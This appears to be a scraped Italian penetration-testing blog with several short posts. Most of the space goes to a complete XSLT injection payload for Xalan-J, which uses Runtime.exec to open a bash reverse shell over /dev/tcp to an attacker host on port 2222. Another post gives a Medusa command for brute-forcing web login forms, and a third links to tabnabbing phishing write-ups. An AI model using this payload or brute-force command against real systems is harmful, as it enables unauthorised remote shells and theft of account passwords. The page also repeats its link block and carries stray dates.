# apt-add-repository ppa:svn/ppa
# apt-get update
# apt-get dist-upgrade
16/01/13
11/01/13
XSLT os command execution (reverse shell)
XSLT code injection
<xsl:stylesheet xmlns:xsl="http://www.w3.org/ 1999/XSL/Transform" xmlns:j="http://xml.apache. org/xalan/java" xmlns:runtime="xalan://java. lang.Runtime" version="1.0">
<xsl:output method="text"/>
<xsl:strip-space elements="*"/>
<xsl:variable name="rt" select="runtime:getRuntime()"/ >
<xsl:variable name="unix_shell" select="'/bin/bash'"/>
<xsl:variable name="unix_option" select="'-c'"/>
<xsl:variable name="command" select="'0<&196;exec 196<>/dev/tcp/< attackerIP>/2222; sh <&196 >&196 2>&196'"/>
<xsl:variable name="separator" select="' ---Separator-- '"/>
<xsl:template match="/">
<xsl:variable name="tmp">
<xsl:value-of select="concat($unix_shell, $separator, $unix_option, $separator, $command)"/>
</xsl:variable>
<xsl:variable name="cmd" select="j:java.lang.String. new($tmp)"/>
<xsl:variable name="array" select="j:split($cmd, $separator)"/>
<xsl:variable name="proc" select="runtime:exec($rt, $array)"/>
</xsl:template>
</xsl:stylesheet>
Riferimenti:
http://xhe.myxwiki.org/xwiki/bin/view/XSLT/Engine_XalanJ
26/04/12
BruteForce with Medusa: web-form
Un'ottima alternativa a THC-HYDRA: Medusa
Per effettuare il brute force di un form web:
#./medusa -h [IP|host] -U file_utenze -P file_password.txt
-M web-form -m FORM:"path/page.php" -m DENY-SIGNAL:"testo in caso di deny"
-m FORM-DATA:"[post|get]?user=&pass=&login=login"
Il comando seguente mostra i moduli presenti e richiamabili con l'opzione "-M":
#./medusa -d
25/03/12
TabNabbing
Tabnabbing usando SET:
http://pentestlab.wordpress.com/2012/03/20/tabnabbing-attack-method/
Spiegazione e esempio di Tabnabbing:
http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/
http://pentestlab.wordpress.com/2012/03/20/tabnabbing-attack-method/
Spiegazione e esempio di Tabnabbing:
http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/
28/02/12
Iscriviti a:
Post (Atom)